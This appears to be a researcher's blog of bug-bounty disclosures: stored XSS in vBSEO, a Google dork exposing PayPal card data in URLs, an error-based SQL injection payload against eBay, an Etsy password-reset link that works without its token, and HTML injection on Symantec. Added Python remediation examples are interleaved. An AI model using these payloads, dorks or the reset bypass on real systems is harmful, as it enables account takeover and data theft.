Sunday, April 5, 2015
Monday, January 20, 2014
Quick internet sharing - Laptop to mobile
Posted by Yogesh
9:59 PM
Hey all,
If you want to share your laptop's internet connection with your mobile device without using any third-party tool, and in just a couple of steps, yeah, very quickly ;), then follow the steps given below.
Step 1.
Open Command Prompt as an Administrator.
Step 2.
Enter the commands given below.
Command 1.
netsh wlan set hostednetwork mode=allow ssid=abcd key=10 Digit Key
Note: ssid can be any name; it will be displayed as the Wi-Fi network name.
Key can be any 10-digit number, e.g. 0000000000.
Command 2.
netsh wlan start hostednetwork
Step 3.
Go to the properties of your Local Area Connection which is connected to the Internet. Then click on the Sharing tab and select the check box under "Internet connection sharing".
Now select the network which we created using the commands [here, abcd]. Click OK.
Tuesday, December 24, 2013
Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO
Posted by Yogesh Jaygadkar
11:07 AM
Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO.
Found By: Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter: sendtrackbacks
The vBSEO plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'sendtrackbacks' parameter upon submission to the /forum/newreply.php & /forum/newthread.php scripts. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
POC:
http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.VictimVBForum.com/forum/newthread.php?do=newthread&f=
In the Advanced Reply or New Thread page, put your ">vector in the "Trackback" options.
Submit the Reply. (You can also test it by clicking Preview Post button)

Done ;)
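The two controls that close this class of flaw, input validation of the trackback list and output encoding when the value is written back into the form, shown as an added example that is not vBSEO code. The input markup, the limit of five URLs and all function names are assumptions; the sample value is constructed and harmless.

```python
import html
from urllib.parse import urlsplit

MAX_TRACKBACKS = 5            # assumed limit, not a vBSEO setting
FORBIDDEN = set("\"'<>`\\")   # never needed in a trackback URL


def parse_trackbacks(raw: str) -> list[str]:
    """Validate a submitted 'sendtrackbacks' value: whitespace-separated URLs."""
    urls = raw.split()
    if len(urls) > MAX_TRACKBACKS:
        raise ValueError("too many trackback URLs")
    for url in urls:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            raise ValueError(f"not an http(s) URL: {url!r}")
        if FORBIDDEN & set(url) or not all(0x21 <= ord(c) <= 0x7E for c in url):
            raise ValueError(f"illegal character in URL: {url!r}")
    return urls


def is_accepted(raw: str) -> bool:
    """True when the whole submitted value passes validation."""
    try:
        parse_trackbacks(raw)
        return True
    except ValueError:
        return False


def render_unsafe(raw: str) -> str:
    """The flaw as described: the submitted value is echoed back verbatim."""
    return f'<input type="text" name="sendtrackbacks" value="{raw}">'


def render_safe(raw: str) -> str:
    """Encode for the HTML attribute context on every output path."""
    return f'<input type="text" name="sendtrackbacks" value="{html.escape(raw, quote=True)}">'


# Constructed, harmless test value in the shape of the post's '">vector'.
SAMPLE = '"><b>x</b>'

if __name__ == "__main__":
    print(is_accepted("http://blog.example/trackback/1"))
    print(is_accepted(SAMPLE))
    print(render_unsafe(SAMPLE))
    print(render_safe(SAMPLE))
```

Validation alone is not enough for the Preview Post path, where rejected input may still be shown back to the user, so the encoding step has to run regardless of the validation result.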
PayPal : User Credit Card Information Disclosure
Posted by Yogesh
10:21 AM
Okay... So, here is another old & duplicate bug from PayPal, which I reported looooong back.
I have found some strange results from api-3t.sandbox.paypal.com. This subdomain is storing all credit card information of PayPal users in the URL. Below is the Google dork for finding such “stored” CC details.
Google Dork: site:sandbox.paypal.com inurl:CVV2=
Google results are not many, nearly 80, but still harmful as sensitive user information is getting leaked.


Friday, February 22, 2013
Listed in Barracuda Networks Hall of Fame
Posted by Yogesh
11:28 PM
Listed in Barracuda Networks Security - Hall of Fame.
Thanks :)

Found multiple vulnerabilities in Barracuda security products. Bugs are still not patched. I'll update the POC once all bugs get patched.
Thanks :)
Wednesday, February 20, 2013
Listed in Google Hall Of Fame
Posted by Yogesh
11:35 PM
After 2 continuous duplicate bugs & 2 rejections, Google accepted my 3 bugs...
1 bug is fixed, 2 more in a row :D The 1st bug did not qualify for a reward, so they listed me on their Google Hall of Fame - distinction. But soon I'll be on the Reward Recipients page ;)

So, finally I am listed in the Google Hall Of Fame. I'll update the POC once all bugs get patched.
Friday, January 25, 2013
SQL Injection Vulnerability in ebay sub domains
Posted by Yogesh
10:13 AM
Title: SQL Injection Vulnerability in www.ebay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara
Greets : Rahul Bro, Aasim, Sandeep, Sagar
Description:
Last month I reported SQL Injection vulnerabilities in www.ebay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me in their Researchers Acknowledgement Page. Like every other bounty hunter, I was also searching for some vulnerability in eBay. At that time I had no idea that eBay doesn't give a bounty for any vulnerability. Not even for SQL Injection. :)
POC:
Vulnerable Parameter: “checkbox” array POST parameter.
The Search option in the above pages provides “Select Site” checkboxes which filter the search results by country.
HTTP Headers:
Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/searchAnnoucement.php-time=Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
POST Contents: checkbox%5B%5D=(select+1+and+ row(1%2c1)>(select+count(*)% 2cconcat(CONCAT(CHAR(68)%2C( SELECT+USER())%2CCHAR(65)% 2CCHAR(86)%2CCHAR(73)%2CCHAR( 68))%2c0x3a%2cfloor(rand()*2)) x+from+(select+1+union+select+ 2)a+group+by+x+limit+1))&
So this is all for submitting the report. After that I simply used sqlmap the gr8 :)
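How an array parameter like “checkbox” should reach the database, as an added example that is not eBay's code: every element is checked against an allow-list and bound as a parameter instead of being joined into the SQL text. The table, the site ids and the function names are constructed, and sqlite3 stands in for whatever database the site used.

```python
import sqlite3

ALLOWED_SITE_IDS = {1, 2, 3}  # constructed ids for the "Select Site" checkboxes


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the search backend (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE announcements (site_id INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO announcements VALUES (?, ?)",
        [(1, "Fee update"), (2, "Maintenance window"), (3, "New category")],
    )
    return conn


def search_unsafe(conn, checkbox):
    """Vulnerable pattern: the array values become part of the SQL text."""
    sql = ("SELECT title FROM announcements WHERE site_id IN (%s) ORDER BY title"
           % ",".join(checkbox))
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, checkbox):
    """Allow-list every element, then bind the values as parameters."""
    ids = []
    for value in checkbox:
        if not (value.isascii() and value.isdigit()) or int(value) not in ALLOWED_SITE_IDS:
            raise ValueError(f"unexpected site id: {value!r}")
        ids.append(int(value))
    if not ids:
        return []
    marks = ",".join("?" * len(ids))
    sql = f"SELECT title FROM announcements WHERE site_id IN ({marks}) ORDER BY title"
    return [row[0] for row in conn.execute(sql, ids)]


def safe_rejects(conn, checkbox) -> bool:
    """True when search_safe refuses the submitted array."""
    try:
        search_safe(conn, checkbox)
        return False
    except ValueError:
        return True


# Constructed value that changes the query's logic when concatenated.
TAUTOLOGY = ["1) OR (1=1"]
```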
Tuesday, January 8, 2013
Password Reset Vulnerability in etsy.com
Posted by Yogesh
3:36 AM
Title: Password Reset Vulnerability in etsy.com
Vuln URL: https://www.etsy.com/confirm.php?email=
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public Released: Jan 08, 2013
Description:
In etsy.com, when users reset their password, they receive a password reset link which is as below.
https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
When I received this mail, I started playing with this link. I noticed that the token is not getting validated on the server side. So I removed it & tested with my own ID.
Final POC:
https://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And Password changed successfully.
Thanks to etsy security team for quick reply.
Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar
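The server-side check that was missing, as an added example that is not Etsy's code: the reset is authorized only when the code is present, matches the stored value in constant time, has not expired and has not been used. The class, its method names and the one-hour lifetime are assumptions, and authorize_unsafe is one hypothetical shape of the flaw.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 3600  # seconds a reset link stays valid (assumed value)


def _digest(code: str) -> bytes:
    return hashlib.sha256(code.encode()).digest()


class ResetTokens:
    """Server-side record of outstanding reset codes, keyed by e-mail address."""

    def __init__(self):
        self.pending = {}  # email -> (sha256 of code, expiry timestamp)

    def issue(self, email, now=None):
        now = time.time() if now is None else now
        code = secrets.token_urlsafe(32)
        self.pending[email] = (_digest(code), now + TOKEN_TTL)
        return code  # value for the code= parameter of the e-mailed link

    def authorize_unsafe(self, email, code, now=None):
        """Hypothetical flawed handler: a request without code= skips the check."""
        return code is None or self.authorize(email, code, now)

    def authorize(self, email, code, now=None):
        """Allow the reset only for a present, matching, unexpired, unused code."""
        now = time.time() if now is None else now
        stored = self.pending.get(email)
        if not code or stored is None:
            return False
        expected, expiry = stored
        if now > expiry:
            del self.pending[email]
            return False
        if not hmac.compare_digest(_digest(code), expected):
            return False
        del self.pending[email]  # single use: the link cannot be replayed
        return True
```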
Tuesday, July 3, 2012
HTML Injection in Symantec.com
Posted by Yogesh
8:03 AM
Title : HTML Injection in Symantec.com
Vuln URL : http://www.symantec.com/business/support/index?page=content&id=
Author : Yogesh D Jaygadkar
Reported : July 02, 2012
Fixed : July 03, 2013
Public Released : July 03, 2013
OS : Win7, Win XP, Ubuntu
Description:
HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at the client side. So if an attacker embeds HTML/script tags such as <html>, <SCRIPT>, <OBJECT>, <APPLET>, or <EMBED> into a web site, the web browser will render or execute them. While searching for some anti-virus related information I found that the Symantec Antivirus official website is vulnerable to HTML Injection. An attacker can add HTML tags into the URL to execute HTML code on the website.
Screenshot 1 :
Screenshot 2 :
Saturday, June 2, 2012
Listed in Microsoft's Security Researcher Page
Posted by Yogesh
8:44 PM
Finally I'm listed in Security Researcher Acknowledgments for Microsoft Online Services.
Thanks to Microsoft & specially Nate from Microsoft for the quick response. Thanks to all my friends.
